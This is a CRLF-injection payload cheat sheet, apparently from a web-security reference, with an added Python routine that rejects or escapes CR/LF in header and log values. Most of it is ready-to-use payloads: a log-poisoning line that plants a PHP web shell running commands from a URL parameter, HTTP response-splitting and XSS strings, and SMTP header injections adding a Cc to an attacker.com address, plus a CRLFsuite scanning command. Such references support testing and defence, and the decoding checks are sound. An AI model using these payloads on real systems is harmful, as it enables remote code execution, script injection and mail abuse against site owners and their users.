CRLF injection
Description

| Description | Character | ASCII (Dec) | Hex | URL Encoded |
|---|---|---|---|---|
| Carriage Return (CR) | \r | 13 | 0x0D | %0D |
| Line Feed (LF) | \n | 10 | 0x0A | %0A |
| CRLF | \r\n | 13 10 | 0x0D0A | %0D%0A |
Log injection
# Log poisoning
%0D%0A<?php system($_GET['cmd']); ?>
HTTP response splitting
# HTTP header
%0D%0AHeader-Test: value-test
# XSS
%0D%0A%0D%0A<html><script>alert(1)</script></html>
# HTTP header Content-Type + XSS
%0D%0AContent-Type: text/html%0D%0A%0D%0A<html><script>alert(1)</script></html>
SMTP header injection
# SMTP header
%0D%0AHeader-Test: value-test
# Same payload after a URL encoder (space encoded as +)
%0D%0AHeader-Test:+value-test
# SMTP header Cc
%0D%0ACc: [email protected]
%0D%0ACc: [email protected]%0D%0ADoesNotExist: True
# Same payloads after a URL encoder (space encoded as +, @ encoded as %40)
%0D%0ACc:+email%40attacker.com
%0D%0ACc:+email%40attacker.com%0D%0ADoesNotExist:+True
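Added defensive example, not part of the original page: the checks a server should apply to a user-supplied value before it reaches a response header, an SMTP header or a log line. It URL-decodes once (the form the payloads above arrive in) and then refuses or escapes the CR/LF characters from the table; function names are my own, `urllib.parse.unquote` is the standard-library decoder.

```python
import urllib.parse

CR = "\r"  # 0x0D, %0D
LF = "\n"  # 0x0A, %0A


def is_header_safe(value: str) -> bool:
    """True if the value contains no CR or LF, raw or URL-encoded.

    Decoding happens once; a value that is still encoded after one pass
    (e.g. %250D) is left alone because the server would not decode it either.
    """
    decoded = urllib.parse.unquote(value)
    return CR not in decoded and LF not in decoded


def strip_crlf(value: str) -> str:
    """Drop CR and LF where rejecting the request is not an option."""
    decoded = urllib.parse.unquote(value)
    return decoded.replace(CR, "").replace(LF, "")


def log_safe(field: str) -> str:
    """Escape CR/LF so one log entry can never be split into two lines
    (the log poisoning case above relies on starting a new line)."""
    return field.replace(CR, "\\r").replace(LF, "\\n")


def build_header(name: str, value: str) -> str:
    """Build one 'Name: value' line, refusing values that would end the
    line early and start a new header (HTTP response / SMTP header splitting)."""
    if not is_header_safe(value):
        raise ValueError("CR/LF in header value")
    return f"{name}: {urllib.parse.unquote(value)}"


if __name__ == "__main__":
    # Constructed inputs mirroring the payload shapes listed on this page.
    print(build_header("Header-Test", "value-test"))
    print(is_header_safe("%0D%0AHeader-Test: value-test"))  # False
    print(log_safe("user=bob\r\nuser=admin login ok"))
```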
Tools
CRLFsuite
crlfsuite -t http://<target>/param1=value1&param2=value2